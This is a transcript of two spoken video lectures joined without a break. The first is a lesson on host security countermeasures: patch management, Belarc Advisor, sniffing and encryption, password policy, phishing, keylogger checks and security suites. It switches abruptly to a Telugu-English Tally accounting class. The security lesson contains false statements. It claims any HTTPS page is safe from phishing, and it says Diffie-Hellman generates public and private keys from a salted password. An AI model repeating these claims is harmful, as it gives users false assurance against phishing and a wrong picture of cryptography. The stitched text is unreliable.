organization I have a concept called bring your own device, where end user can bring their own systems and connect it to the office network. Now assume I have 100 people working with my organization. Now all 100 people are bringing in their laptops to get connected to the office network. But how do we say that all these 100 computers are safe? We cannot say that. So what we do, we create a baseline. We say that all the systems should have a genuine operating system and a genuine antivirus application installed. So here I am just taking a precaution that if there is a genuine operating system and a genuine antivirus installed, I don't have to worry about any sort of vulnerabilities or any kind of malwares. And then I should also say that user should have installed the latest service pack. Now I can tell the user that if user is trying to use Windows 7, I will say user will have to install service pack 2. Without service pack 2, I will not let the user access his computer in the network. Or now user is going on with Windows 8. I would say user should have Windows 8.1 update installed. Without this I will not permit him. Or if user is trying to use say Windows 10, we say at least Windows 10 version 1803 should be used. Anything before that will not be permitted. Or no user is coming up with a Linux operating system, I would say he should have the latest security updates related to 2018.10, that is all the security updates of the month October in 2018.
So if these updates are not installed, we are not going to permit him to access any resources in our network. So that is what we call as creating a baseline security template, and all the systems should have minimum requirement fulfilling this baseline security or higher. So this is how we can go with the countermeasure for operating system related or application related vulnerabilities. And of course, along with this we also require IPS, which I will be explaining now. Now here, assuming a hacker is successful in finding what is a vulnerability on a server even before we have taken the necessary precautions. So hacker would try to launch an attack. So technically we call this as an exploit. So hacker is trying to launch an attack on the system by understanding what actually is the vulnerability there. So here, as explained earlier, we'll have to first try to fix what all vulnerabilities are present. So for this we go with patch management. So in this we have different steps, that is trying to understand what is the vulnerability, understand the vulnerability. So we'll have to first understand what actually is this problem there, and then download the security patch. Downloading the security patch is the second step. Then the third step, test it on a test machine. So we'll have to test whether this security patch is compatible with all the other applications or services what we are using, and it is also stable. And then finally deploy the security patch. So this is how we go with. So we'll have to first understand what actually is a vulnerability, then download the security related patch, then try to test it on a test machine, and then finally deploy it. So let me show you how we can find out if there are vulnerabilities on our system or we are missing any security updates. So in order to find out what vulnerabilities exist on a computer, as we have been discussing earlier with our scanning session, administrator can perform a vulnerability scan. Administrator can perform a vulnerability scan on all the systems in the network by using applications like Shadow Security Scanner or Nessus or Acute-NX. And then he will also have to check with the available security patches or see what all missing security patches are present. So here, to view all the missing security patches, we have to run an application called Belarc Advisor. It is a free application, can be directly downloaded from belarc.com. It shows us all the missing security patches information of our computer. Now, missing security patches doesn't mean only for our Microsoft products. It will also show us missing security patches for any other products also. So here, when we look into this, it says the security benchmark scoring on this particular computer is 0.63 on a scale of 10. So it says that this system is really not secure, and it says related to antivirus protection it is up to date, but when it comes to security updates, it says 123 security updates are missing in here. So this is the status of this particular computer. So when we scroll down here, it shows us what is the operating system that we have used, what is the service pack installed, and what is the build version. Tells us a language which is used, and also the time zone and when exactly it was installed. Also tells us what is the system platform. So I am running this on a virtual machine, so it says this is a VMware virtual platform. And then coming into the processor, it tells us what kind of processor is used on this computer, and then what is the motherboard, information about our hard drive status, and also information about the memory, how much RAM is installed. Then also tells us information about the user accounts which are present and also the privilege level. So if a user account is disabled, it just shows a cross mark there. Then coming into all the missing updates, all the security fixes. So here it shows us with all the security updates which are missing in. And here, as we can see, it also tells us how important it is, whether it is a critical issue or is it really important or it is low risk. So
So it is also showing us what actually is the severity level, whether it is high risk or low risk, or whether it is really very important or not. So like this, it just gives us with list of all the missing security updates on this computer. So once we have this information, we will be able to directly go into that particular link and try to see what actually is that particular update about. Okay. So might be Microsoft is not directly giving us access to it, but no issue. Let me just look in for something else. Okay. So it says like the product what is installed on my computer, the Shockwave Player version 12.2 has been installed somewhere in 2017 and I would require an update. So the solution is I have to install 12.31.201. okay, so this the current version installed is 12.2, which is old, and as per Adobe they says I have to install 12.3.1.201, and they are also directly giving us with the link where we can download it. So this Belarc will directly redirect us to the location where we can download the available security patch and secure our computer. So this is how Belarc will help us understanding what all security patches are missing on our computer. So accordingly we will be able to take up the necessary actions to protect our systems. So then, speaking of the other technique, assuming where a hacker is in our network. So far we have been assuming that hacker is somewhere on internet and he is trying to crack our passwords. But now let us assume hacker is not somewhere on internet, but he is within our network. So here, for a hacker to take over control of our systems, if he is present within the network, all he needs to do is steal our passwords or crack the passwords. So here we have been going through with the different techniques what hackers can use, and the first technique is something like sniffing. So what actually happens in sniffing is hacker is trying to capture the password between two different computers when user is trying to log into the server. So it is like this. So assuming I have a server and we also have a client computer, or let us say this is the admin's computer and this is a hacker. Now when administrator is logging into the server, hacker is trying to capture this traffic using a technique called man in the middle. So he is using man in the middle attack to capture the traffic and view what is the user ID and what is the password. Now this is one of the most dangerous attack that a hacker can perform. Now here, for us to protect ourselves from this, what we need to do is we have to go with something called end-to-end encryption. So here the solution is we'll have to go with end-to-end encryptions. Now this actually depends on a process called cryptography. So cryptography is a process where we try to encrypt and decrypt the data in order to secure it. So here generally when we speak of encryption, there is a process where we convert clear text information to unknown format. So this unknown format is called as ciphertext. So we are just trying to convert clear text data into an unknown format or ciphertext. So let us see how actually end-to-end encryption works. So assume there are two different systems, system A and system B. Now maybe these two systems are part of the same network or they are connected through internet. Now assuming that system A has to send some information to system B. Let us say source is A and destination is B, and they have to send some data. Now here we are always concerned about protecting our data. So
we will try to encrypt the data part here of this particular packet. Now let us say system A has a password which is like abc@123. So this is a password which is used by system A to encrypt this particular data. Now once the packet has been sent to system B, now B receives this packet but is not able to directly view the content of it. That is because whatever the data that we have sent has been encrypted. So now what B has to do is, B will have to first decrypt it. So decryption means B will have to reverse this encryption to get back access to the original data. So to do this, B should also know what is the password that A has used for encryption. So B should also have the same password as A so that it will be able to decrypt the data. So for this to be successful, system A will have to first tell system B that, see, I am going to use abc@123 as a password for encryptions. So here we are going to use a same password for both encryption and decryption. This we call as symmetric key exchange method. We call this as symmetric key exchange method, where a common password will be used by both system A and system B for encrypting and decrypting the data. But unfortunately, assuming there is a hacker who is sniffing the traffic, hacker will also be able to see what is the original password, and hacker can also decrypt our data. So generally it is not recommended to go with the symmetric key encryptions because the chances of your password or the key being exposed to the hacker is very high. But as an alternate, we can also use something called asymmetric key exchange, where we will not be using the same password for encryptions and decryptions. So in asymmetric key exchange, we are not going to use the same password for encrypting and decrypting. So what actually happens here? You either depend on a third party key mechanism like internet key exchange, IKE. You have to provide your password. Let us say I am giving my password as abc@123, and now what IKE does, it takes up this clear text password. To this it will add some random data, abc@123. It is also adding up some random data. We call this as salt. Now over this it runs an algorithm called Diffie-Hellman algorithm. Now the output of this Diffie-Hellman algorithm is you get two different passwords, a private key and a public key. You get two different passwords, a private and a public key. Now as the name says, this private key will be present only on the system and public key will be exchanged with the other computer. So if I am exchanging data between two different computers, I will be giving away my public key to the other system and ask them to encrypt all the data with public key. Then I can use my private key to decrypt it. So here this is how the scenario looks like between system A and system B. So system A and system B, we have two different systems here, assuming both are connected via internet. So here, as we said, we will be running IKE. You have public key A and private key A. In the same fashion, we also have public key B and private key B. Now both the public keys will be exchanged. So public key A will be shared with system B and public key B will be shared with system A. So here on system A we also have public key of B, on system B we have public key of system A, or we can also call it as a user if two users are exchanging this. Now when we speak of the hacker, hacker is able to capture our public keys. He is able to capture public key A as well as
public key B, but he doesn't have access to the private keys. Now here when we speak of the data being encrypted, assuming data is sent from system A to system B, all the data will be encrypted using public key of B. So we are trying to encrypt it with the public key of recipient. So whoever is receiving the data, we are using their public key to encrypt this. So this makes it possible only for system B to decrypt the data using its private key. Now the best example of this sort of implementation we see is with your WhatsApp messenger. Now whenever you try to send a message to any WhatsApp contact, they say like the conversation with this so-and-so contact is encrypted with end-to-end encryption. So that actually makes it impossible for any other party to decrypt the message and view it, except for the sender and the recipient. So even the WhatsApp servers will not have access to your data content. So if you are using any application which supports end-to-end encryption, this actually makes it impossible for a hacker to sniff and view your traffic. So that gives us with very good security against sniffing attacks. And then when we speak of the other kind of attacks, hacker can capture our hash values and then try to brute force it or use a dictionary based attack. So basically in brute force, hacker is trying to test all possible combinations of alphabets, numbers and special characters. Or in case of dictionary based attack, hacker is trying to create a password dictionary by guessing what can be the correct password and then use it for cracking the hash value. So here the best way to protect ourselves is try to use a password which contains alphabets, both lowercase and uppercase. So let us use lowercase and uppercase characters, numbers and also special characters. So not just going on with only lowercase or only uppercase, we'll have to use a combination of everything. And generally it is recommended that your password should be at least 12 characters or more. And whenever you have an option, if the service supports it or it is available, try to use OTP or a one-time password. Though for most of us it might seem to be a little bit of inconvenience that you type a user ID, you type a password, then again you'll have to receive an SMS or a call from the service provider, get one more password and all. But this is actually trying to secure our systems. So even if hacker is able to steal our user ID or password using phishing or key logging, unless he has access to the OTP, he will not be able to log in. So this gives us with very good security against brute force or dictionary based attack. Or if you are an administrator yourself, try to limit the number of password attempts that a user can go with. So if you are maintaining a server, it's better you say like after 3 or 5 failed attempts, after 3 failed attempts or maybe 5 failed attempts, after 3 or 5 failed attempts, block the user account for some duration. Maybe you can block it for a duration of 1 hour or maybe like 12 hours, same like what our banking systems do. Right. So this will actually discourage the end user because he cannot go with brute force attack because no one have patience to wait for next 12 hours just to try another 3 password combinations. So these kind of precautions can be taken to protect ourselves from brute force attack. And then coming into the next attack method, that is phishing attack. Now we all know that in phishing, hacker is trying to trick the end user by making him logging into a fake web page. So here the most simplest way is always look into the address bar of your URL, right? And if it is a HTTPS website, you are safe. If it is not a HTTPS website, then it's very clear that this is a fake web page, it's a phishing page, and do not type any user ID and password. So any web page which is asking you to type your username or your password or maybe give any other kind of confidential data like your net banking or your credit card details or anything, they all should be HTTPS web pages. And sometimes if a hacker is trying to give you with a fake web page, you may also see some error messages like your web browser tells you that this particular HTTPS web page cannot be trusted.
be very careful if you see that kind of warning message. Maybe someone is trying to give you with a fake HTTPS certificate, or maybe sometimes your browser says HTTPS but it's crossed out. So you'll have to be very careful in that case. So your web browser tells you that there is a problem with HTTPS connection in two conditions. One, it is not receiving a valid certificate from the server. So if it is not receiving a valid certificate from the server, there should be someone sniffing your traffic. That's the reason. Or the second case, check with the date and time of your computer. Maybe your date and time is not properly set. If your computer's date and time is not properly set, you'll still see that the HTTPS sessions are not accepted. That is because every HTTPS certificate will have a specific validity time. So if your computer's date and time is not matching with the certificate's validity time, it says that your HTTPS is not trusted. Or maybe someone is trying to sniff your HTTPS traffic. So be very, very careful when you are accessing some websites where you have to give user IDs and passwords, or maybe your login credentials or credit card details or any other confidential data. Then speaking of keyloggers, so here when we speak of a keylogger is one of the most dangerous software or a application which can monitor all the activities of a user and report it back to the hacker. And the worst thing, keylogger is not visible to the end user. So in such case, we have to use an application like Belark Advisor. So the same application that we have used earlier to see what all missing security patches are there on the computer. Belark can also identify what all softwares are installed on our computer and show us with a list of it. Now based on Belark, we can see if we have any kind of unknown or suspicious applications installed on our system. So let us see that. So here I am going on into the Belark report. So here we are able to view all the missing security updates. So on the same page, you can just scroll down, and here finally it shows you what all softwares are installed on the computer. So it gives you with a list of all the softwares that are present. Though Belark doesn't highlight or doesn't tell you that this is a keylogger, it shows you with all the softwares installed here. Now you have to go through with each and every software and see what actually it is. And if you want to see the location where exactly it is installed, you'll be able to click on this symbol I right next to every software. It directly takes you to the location where it is installed. Now based on the location, based on the file names, you can see whether it is a genuine software or something malicious. Or you can take up these file names and also perform a Google search and see what other people have to say about these softwares. So here when we look into Belark results, so here we can see that there are some applications, something like local synchronization host. So this is a version what I am speaking of. Local synchronization host. So generally the name doesn't look suspicious. Maybe it is about some synchronization between my computer or some other computer. So in such condition, even if you come across any unknown application name, always suspect it might be something dangerous or malicious. So directly click on the link. So here as we can see Windows System32 MPK. So here we come across some folder and there are some files and all, but we are not really sure what actually it is. So let us perform a Google search. Okay, so here we can say mpk.exe in System32. So we can directly perform a Google search, and here as we can see Google is giving you with different sort of results. So we'll have to patiently keep checking with each and every result here. And here you can see Windows System32 mpk.exe. It says that this is something about a keylogger. So this is how you'll be able to manually go through the entire list and identify whether it is a genuine application or not. So finding a keylogger is easy if you have little bit of patience and you can spend some time with
checking all the applications which are reported by Belark Advisor. And then speaking of how do we protect ourselves from malware. Now malware can be different types. It can be virus, it can be worms, it can be a Trojan, can be a rootkit, can be a ransomware and all. So in such conditions, it's always advisable to go with a total security suite application, which also includes a personal firewall and a host IPS module. So let me show you how actually a total security suite application looks like. So here I have installed something called Bitdefender Total Security Suite. So when we look into the protections, so it has antivirus protection, it also has a vulnerability scanner, has a personal firewall, anti-spam protection, online threat prevention, advanced threat defense, safe files, ransomware remediation. So it has all the required security features to protect our computer from antivirus or worms or Trojans and all. At the same time, it also has a firewall, it has anti-spam, it has a vulnerability manager, it identifies what vulnerabilities are present on our computer and give us a report, and it also has protection from ransomware. So these sort of features will be getting in a total security suite application. Okay, so we'll be getting total security suite with these sort of different features and all. Now not only this, even here when we look into our web browsing activities, see this, even though we are getting a response from Google, right, for every search result, it tells us whether this particular web page is safe for us to access or not. So this is how it also gives us with web-based protection. Or maybe I'm trying to download a software from internet. So I visit this particular web page, icar.org, and I'm trying to download a software from this. So here I have an anti-malware test file. So it is like a virus which can be downloaded to see if your antivirus is working properly or not. So I can directly go into download and say try to download the virus file. Now here as we can see, it tells that the file what you are trying to download is virus and that has been blocked. This has been done by your web protection. So a total security suite will include all the required features or the required modules to protect our computer from different sort of malwares. And even it also has a ransomware protection and a personal firewall also. So this is how, if we are using a total security suite, we will be able to protect our computers and also our data from damage with any sort of different kind of malwares. So if you are a home user, you can follow with all these particular steps, like trying to download and install all the latest security patches or fixes, and then trying to have a very secure password, and if possible trying to use an OTP, and also installing a proper total security suite application with all the latest updates, so that your computer will be safe from different sort of attacks. And also a little bit of patience when you are accessing something on internet, because whenever you try to come across some application or an offer or a deal, just think for a second or two, is it really possible? What actually is it? So once you go through with that, you will be able to protect yourself, maybe from phishing kind of attacks or any sort of malwares that you try to download, or any kind of keylogger or any kind of other tricks that hackers can play. Now even if you are an administrator, to protect your host computers or your servers, you go with the same precautions. You still have to go with the same procedure. But if you are trying to protect a network, so there we also have few additional things to be taken care of, like installing a firewall or intrusion prevention system. So that we will be discussing in our next session. We will see what actually a firewall is, what is an intrusion prevention system, and how do we use them. So this is with countermeasures for the host systems. Thank you all. Hello, good
morning students, welcome to Mana TV, welcome to Tally training program conducted by AP SSTC, right. So, in the last few sessions, I hope we have done 8 sessions. In these 8 sessions, we have done with how to create a company, how to create the ledger accounts with groups, how to create the inventory stock with groups, and we have seen the voucher entries also, right. We have seen almost 6 voucher types, that is sales, purchase, receipts, payments, journals and contra. At these 6 voucher types we have done, and we have solved one solutions on that, one problem on that, right. Today we are going to see some other from other vouchers also, like how to make the journal vouchers, okay, how to make the sales invoice with inventory. In the last session we have seen only accounting part, right. So, we have seen receipts, payments and all, and also we have seen all the entries how to solve without inventory, and I had shown you how to do the closing stock without inventory, right. So, మన లాస్ట్ 8 క్లాసెస్ నుండి చూసుకున్నట్టయితే మన కంపెనీ క్రియేషన్, లెడ్జర్ క్రియేషన్, స్టాక్ ఐటమ్ క్రియేషన్, వోచర్ ఎంట్రీస్ ఇవన్నీ చూసాము. రిపోర్ట్స్ ఇంకా చూడలేదు. సో రిపోర్ట్స్ వీ హ్యావ్ సపరేట్ క్లాస్ ఫర్ దట్. వీఆర్ గోయింగ్ టు సీ ఆల్ ద రిపోర్ట్స్ ఇన్ దట్. సో మనం ఫర్దర్గా వచ్చే క్లాసెస్లో అన్ని రిపోర్ట్స్ కూడా చూద్దాం. సో ఇవాళ మనము నిన్న సెషన్లో వోచర్ ఎంట్రీస్ చూసాము, ఒక ప్రాబ్లం కూడా సాల్వ్ చేసాము. దట్ ఈస్ వితౌట్ ఇన్వెంటరీ, అంటే స్టాక్ లేనప్పుడు ఎలా చేయాలి అనేది చూసాం. ఇవాళ ఒక ప్రాబ్లం సాల్వ్ చేద్దాం మనము with inventory. So, we are going to solve one problem, how to create with inventory. So, how to make the purchase voucher sales with inventory, right. So, please see the screen now. So, I am opening Tally. So, this is your problem, okay. Create the company in Tally with the following details, okay. So, name of the company is Ganapati Furniture, address is given, okay. Okay, some transactions are given, okay. Purchase are also given, right. Purchases ఉన్నాయి, అలాగే సేల్స్ ఉన్నాయి, అలాగే అదర్ ట్రాన్సాక్షన్స్ కూడా ఉన్నాయి. ఇందులో మనకు ఆన్సర్స్ కూడా ప్రొవైడ్ చేస్తారు ఈ ప్రాబ్లంలో, ఓకే. So, now we are going to see how to do this problem, okay. Right. So, first step is creation of company. So, I am going to create a company, Alt F3, create company. So, the company name, what is the company name? Ganapati Furniture. Okay, address something here, something is given like what is shop number 12, shop number 12, ground floor, Ramnagar, Hyderabad. Country is India, state is Telangana, pin code is 5,20,000, phone number just again some number, okay, and I am saying the company. So, company is save చేస్తాం. Now, the first step is creation of company, we have done with that. Now, second step is creation of ledgers. We are going to create all these ledgers, right. So, accounting info, ledgers, and I am selecting multiple ledger, okay. So, all items and create చేసి ఇక్కడ ప్రతి ఒక్క లెడ్జర్ క్రియేట్ చేద్దాం మనం, okay. Vinay and Vijay started a partnership business with 2,50,000 each. So, I am writing Vinay capital under capital, next Vijay capital under capital account, okay. Next one, deposit in Canara Bank
under bank accounts. Next, paid cash to Mr. Narsimha towards rent deposit. So rent deposit ఇక్కడ మనము రెంట్ డిపాజిట్ గురించి పే చేస్తున్నాం కాబట్టి మనము రెంట్ డిపాజిట్ చేసుకోవాలి. సో ఆల్వేస్ రిమెంబర్ దట్ వెన్ ఎవర్ యు ఆర్ పేయింగ్ ఎనీథింగ్ అమౌంట్ టు ఎనీ పర్సన్, డోంట్ సీ ద పర్సన్ హూ ఈస్ టేకింగ్ ద అమౌంట్, జస్ట్ సీ ద పర్పస్. అంటే మీరు ఎవరికి పే చేస్తున్నది ఇంపార్టెంట్ కాదు, దేని గురించి పే చేస్తున్నాం అనేది ఇంపార్టెంట్. సో ఆ అకౌంట్ని దాని గురించి డెబిట్ చేస్తాం కాబట్టి మనం ఆ అకౌంట్ క్రియేట్ చేసుకోవాలి. నెక్స్ట్, paid cash towards purchase of computer with Tally software. So I am creating as computer, okay, under fixed asset. Computer fixed asset. Next is paid cash towards furniture work. So furniture under fixed asset. Check received towards loan from Shriram Chit Funds. Shriram Chit Fund loan. So it's an loans liability. Loans and advance ఉంది. ఇది ఎప్పుడు యూజ్ చేస్తాము అంటే when we are giving loan to other person. మనం వేరే వారికి లోన్ ఇచ్చినప్పుడు ఈ లోన్స్ అండ్ అడ్వాన్స్ అసెట్ సెలెక్ట్ చేసుకుంటాం. మనం వేరే వారి దగ్గర నుండి మనం లోన్ తీసుకుంటే లోన్స్ అండ్ లయబిలిటీ సెలెక్ట్ చేస్తాం. Okay, next, cash paid towards stationery under indirect expense. Okay, now this is completed. The next box is about purchase, right? Purchase for the month. Okay, so first purchase for the month. So create purchase under purchase account. Next, ఎవరి దగ్గర నుంచి కొన్నాము? Godrej under sundry క్రెడిటార్స్. ఎవరి దగ్గర నుంచి కొంటామో క్రెడిటార్స్, ఎవరికైతే అమ్ముతామో డెటార్స్. నెక్స్ట్, బాంటియా ఫర్నిచర్ అండర్ సన్రీ క్రెడిటార్స్. నెక్స్ట్, రాజ్ ఫర్నిచర్స్ అండర్ సన్రీ క్రెడిటార్స్. Okay, now this is completed. Now go for the next one, sales for the month. So create sales under sales account. Next, Z solutions under sundry debtors because we are selling to the party. Cash account, there is no need to create cash account because already cash account will be available in Tally. Next one is RRD College under sundry debtors. Right. Next, paid transportation towards transportation on purchases. So create transportation on purchase under direct expenses. Next, cash paid towards transportation on sales. So transportation on sales under indirect expenses. Next, cash check received from Z solutions. Already Z solutions we have done. Cash paid transportation to purchase, already we done. On sales, transportation on sales done. Check issued to Bantia Furniture, Bantia Furniture is done. And balance is discount received. Okay, so create discount received under indirect income. Next one is again here transportation on purchase, transportation on sales. Check received from RRD College and balance is discount. Okay, so check receive చేసుకుంటే డిస్కౌంట్ అలౌడ్ అవుతుంది. చెక్ పేడ్ చేస్తే, చెక్ వరకు ఇష్యూ చేస్తే మనకు అది ఇన్కమ్ అవుతుంది. ఓకే, సో వెన్ యూ ఆర్ రిసీవింగ్ క్యాష్ then discount is allowed. Discount allowed is expense. When we are paying cash, we receive discount, so discount received is indirect income, right? Next, again check issued to Godrej, with Godrej account is done. Check issued to Raj Furniture, this is done. Okay,
cash paid towards salaries under indirect expense. Okay, tea and snacks. So, tea and snacks are treated as staff welfare under indirect expenses. Next, cash paid towards newspaper. So, newspaper bill you can accept as newspaper, or you can take it as books and periodicals, okay, under indirect expenses. Okay. So, we have done almost all accounts. Now, we are going to see the voucher entry. Right. So, students, we have seen, so accounting process we have 5 steps. That 5 steps is creation of company, creation of ledger accounts, okay, creation of company, creation of ledger accounts, creation of inventory, and voucher entry, and what you say, reports. So, we have created the first 2 steps, that is creation of company and creation of ledger accounts, right. The next step is creation of inventory. Okay. So, we have seen some transactions in that problem that paid for tea and snacks. So, ఇప్పుడు టీ అండ్ స్నాక్స్ అని ఉందనుకోండి, మీరు టీ అంటే టీ తెప్పించినప్పుడు టీ ఎక్స్పెన్సెస్ అని, స్నాక్స్ తెప్పించినప్పుడు స్నాక్స్ ఎక్స్పెన్సెస్ అని, లంచ్ వచ్చినప్పుడు లంచ్ ఎక్స్పెన్సెస్ అని, సమ్ అలా డిన్నర్ చేయించినప్పుడు ఏమైనా ఎవరికైనా కస్టమర్స్కి, సారీ మన ఎంప్లాయీస్కి కానీ ఇంకా ఎవరికి కానీ డిన్నర్ ఎక్స్పెన్సెస్, దర్ ఈస్ నో నీడ్ టు క్రియేట్ డిఫరెంట్ ఎక్స్పెన్సెస్. జస్ట్ సో వాట్ ఎవర్ యు ఆర్ స్పెండింగ్ ఫర్ వెల్ఫేర్ ఆఫ్ ద స్టాఫ్, సో వాళ్ళకి టీ, స్నాక్స్, టిఫిన్స్, మీల్స్ అలాంటివి ఏవి చేసినా దట్ ఆల్ ఎక్స్పెండిచర్ విల్ కమ్ అండర్ స్టాఫ్ వెల్ఫేర్ అనమాట. ఓకే. అలాగే ఫర్ ఎగ్జాంపుల్ when you are purchasing pens, when you are purchasing paper, when you are purchasing some erasers, like that. So, this all belong to stationery. So, instead of maintaining pen account, pencil account, eraser account, sharpener account, pen, books account, papers account, there is no need to create. So, this all belongs to stationery. So, you have to put in stationery account. So, అలాగే మనము మంత్లీ వీక్లీ మ్యాగజైన్స్ ఉంటాయి, న్యూస్ పేపర్స్ ఉంటాయి, ఓకే, సబ్స్క్రిప్షన్స్ చేసుకుంటాం ఇవన్నీ. సో ఫర్ దట్ ఆల్సో దర్ ఈజ్ నో నీడ్ టు గో ఫర్ ఈనాడు న్యూస్ పేపర్, సంథింగ్ న్యూస్ పేపర్ అని, ఓకే, మ్యాగజైన్ కొంటే మ్యాగజైన్ అకౌంట్ అని, ఇంకా అట్లా అలా సపరేట్ అకౌంట్ క్రియేట్ చేసే అవసరం లేదు. దర్ ఈస్ అ హెడ్ కాల్ బుక్స్ అండ్ పీరియాడికల్స్. సో వాట్ ఎవర్ యు ఆర్ స్పెండింగ్ ఆన్ దట్ బుక్స్ అండ్ magazines and all, you have to create one books and periodical account, okay, and you have to put in that account. Okay. So, like this, for example, repairs and maintenance undi manaki. So, మన repairs and maintenance, for example, computer మనకి ఏమన్నా రిపేర్ వస్తుంది, సో మనం టెక్నీషియన్తో రిపేర్ చేస్తాం, ఒక 1000 రూపీస్ 500 పే చేస్తాం. అలాగే చిన్న మెషినరీ ఏదో పాడవుతుంది, దానికి మనము ఏదో చిన్న పార్ట్ తెచ్చేసి ఒక 1000-1500 సంథింగ్ పార్ట్ తెచ్చి రిపేరింగ్ చేస్తూ ఉంటాం. సో అలాగే ఆ టెక్నీషియన్కి అమౌంట్ పే చేస్తాం. సో దిస్ ఆల్ ఎక్స్పెన్సెస్ యూ హ్యావ్ టు బుక్ అండర్ what you say, repairs and maintenance. So whenever suppose some amount is paid towards salaries to Mr. X, so don't record Mr. X account. So record for what purpose you are paying the amount, అంటే దేని గురించి పే చేస్తున్నాం. సో ఇందాక మనం చూస్తే క్యాష్ పేడ్ టువర్డ్స్ నరసింహ ఫర్ రెంట్ డిపాజిట్ ఉంది. సో నరసింహ అకౌంట్ క్రియేట్ చేస్తే మనకి నరసింహ అకౌంట్ మన డెబిట్లో క్రెడిట్లో కానీ కనబడుతుంది, అంటే మనకు ఆయనకి డబ్బులు ఇచ్చేది ఉంది అన్నట్టు కనబడుతుంది. సో యాక్చువల్లీ ఇట్స్ అండ్ డిపాజిట్ అకౌంట్, ఇట్స్ అన్ అసెట్ అకౌంట్, రైట్. సో అందుకని ఏ పర్పస్కి ఇచ్చాము అనేది ఇంపార్టెంట్, ఆ పర్పస్ పైన మన అకౌంట్ క్రియేట్ చేసి చేయాలి, రైట్. సో నౌ సీ ద థర్డ్ స్టెప్, హౌ టు క్రియేట్ ద inventory. So please see the screen now. So see the screen. Okay. So the next is inventory info. So stock item create cheyalem, first man units of measures create chestam. So create units of measures. Okay, units of measures ikkada manaki table, almaras, chairs, tables. So this are we are going to sell in numbers, right? Numbers. Okay. Tarvata item. Okay. So stock items create almara. Okay. Units numbers. Tarvata chairs.
numbers. Okay. So, if I want for FIFO, I can go for FIFO method. So, ఇందాకది కూడా ఆల్టర్ చేద్దాము. అల్మారా క్రియేట్ చేస్తాను, అది యావరేజ్ ఉంది. సో ఐఎమ్ గోయింగ్ ఫర్ FIFO. ఓకే. సో ఇప్పుడు ఇదే స్క్రీన్లో ఉండి మీరు మిగతా ఏమైనా ఆల్టర్ చేయాలంటే జస్ట్ పేజ్ అప్ యూజ్ చేయండి. మీ కీస్లో మీ కీబోర్డ్లో పేజ్ అప్ పేజ్ డౌన్ అనే బటన్ ఉంటుంది, అది యూజ్ చేస్తే అంతకుముందు చేసినవి మనకి కనబడుతుంది. ఓకేనా, దట్ ఈస్ వన్ ఆఫ్ ద షార్ట్ కట్ కీ. నెక్స్ట్ వన్ ఈస్ టేబుల్స్, numbers, FIFO method. Okay. Next, sofa set, numbers, FIFO. Center table, sorry, malli table marchipoyanu. Center table, FIFO. Next one, display table, numbers, FIFO. Bookshelves, numbers, FIFO. Next, writing table, FIFO. Next, writing patches, ఓకే రైట్. సో సేమ్ ఏవైతే ఐటమ్స్ పర్చేస్ చేసాం అవే సేల్ చేస్తాం కాబట్టి సేమ్ ఐటమ్స్ ఉన్నాయి. సో ఐఎమ్ నాట్ డూయింగ్ రైట్. సో ఫస్ట్ we have done with the inventory also. Now the fourth step is accounting vouchers. So go for accounting vouchers. So what is the first one? Vijay and Vinay started partnership business with 2,50,000 each, and iddaru 2,50,000 investment పెట్టారు. సో ఇద్దరు పైన రిసీట్ రాసుకోవాలి కదా మనము. సో క్యాష్ ఇస్ కమింగ్ ఇన్, F6 రిసీట్, క్యాష్, Vinay capital. Okay, 2,50,000. Okay, next again cash, Vijay capital 2,50,000. Next, deposited in Canara Bank, F4. So Canara Bank lo deposit chesamu. So what is increasing? Canara Bank balance is increasing, cash account is decreasing. How much we are depositing? 2,50,000. Next is rent deposit. So paid cash. So payment, cash, rent deposit. Okay, 34,500. Okay, if you want you can write paid cash to Mr. Narasimha towards rent deposit. Next one, cash paid towards purchase of computer. Cash paid, cash is going out, cash, computer we have purchased. What is the amount? 35,000. Okay, I'm not writing narrations. Okay, paid cash towards furniture work. So furniture work ante furniture work మనం చేస్తాం కదా, దాని క్యాష్ పేమెంట్ పోతుంది. సో క్యాష్, ఫర్నిచర్ ఇన్ ఫిక్స్డ్ అసెట్. So selecting furniture work 25,000. See, suppose 3,50,000 ఫర్ ఎగ్జాంపుల్ ఇచ్చాను అనుకోండి. ఇక్కడ మీరు అబ్జర్వ్ చేసినట్టయితే క్యాష్ రెడ్ బ్యాలెన్స్లో కనబడుతుంది. క్యాష్ రెడ్ బ్యాలెన్స్లో ఎందుకు కనబడుతుంది? బికాస్ we don't have cash but we are paying it, so that is why it is showing as red color. Okay, 2 lakhs. So actually we have paid 25,000. If you observe now, it is 1,55,500 is debit balance. So
like that you can have current balance. So what is the current balance of cash? It is 1,55,500. Okay. సో అట్లా రెడ్గా వచ్చినప్పుడు మీరు కొంచెం అలర్ట్ అయిపోవాలి, అంటే అన్నెసరీగా మీరు ఎక్కువ క్యాష్ ఏమైనా పే చేస్తున్నారా ఏంటి అనేది. ఓకే. సో చెక్ రిసీవ్డ్ టువర్డ్స్ లోన్ ఫ్రమ్ శ్రీరామ్ చిట్ ఫండ్. చెక్ రిసీవ్డ్, వీఆర్ రిసీవింగ్, సో గో ఫర్ F6. సో చెక్, సో కెనరా బ్యాంక్. ఓకే. ఫ్రమ్ శ్రీరామ్ చిట్ ఫండ్ లోన్స్, సెలెక్ట్ శ్రీరామ్ చిట్ ఫండ్ లోన్స్. How much amount is 5 lakhs. Okay. So here if you are transferring cash, check, how we are doing it, you can write instrument number is nothing but check number. Okay. Next, paid stationery, cash paid towards stationery. So paid, FI, payment, cash, stationery. Okay. 5,000. Okay. Next one, purchase for the month of. So these all are comes under purchase. Okay. ఇక డేట్, రిఫరెన్స్ నెంబర్ ఉంది. ఓకే. ఎవరి దంచులు కొన్నాము, ఏం ఐటమ్ కొన్నాము, క్వాంటిటీ ఎంత, రేట్ ఎంత, అమౌంట్ ఎంత. సో ఎవ్రీథింగ్ ఈజ్ హియర్. ఓకే. నౌ వీఆర్ గోయింగ్ టు డూ దిస్ పర్చేస్. రైట్. సో సింపుల్. F9 purchase. సో రిఫరెన్స్ నెంబర్ ఉంది కదా, రిఫరెన్స్ నెంబర్ నథింగ్ బట్ పార్టీ సప్లై ఇన్వాయిస్. అంటే మనం పర్చేస్ చేసినప్పుడు బిల్ నెంబర్ ఉంటుంది కదా, ఆ బిల్ నెంబర్ ఇక్కడ ఇవ్వాలన్నమాట. సో ఎంత బిల్ నెంబర్ 50, డేట్ 1st April. ఓకే. సో ప్లీజ్ స్టూడెంట్స్ ఇక్కడ కొంచెం జాగ్రత్త చేయండి. ఇక్కడ రైట్ సైడ్ అబో ఏదైతే ఉందో, ఇక్కడ రైట్ సైడ్ ఇది మనం ఏమంటాము అంటే ఎంట్రీ 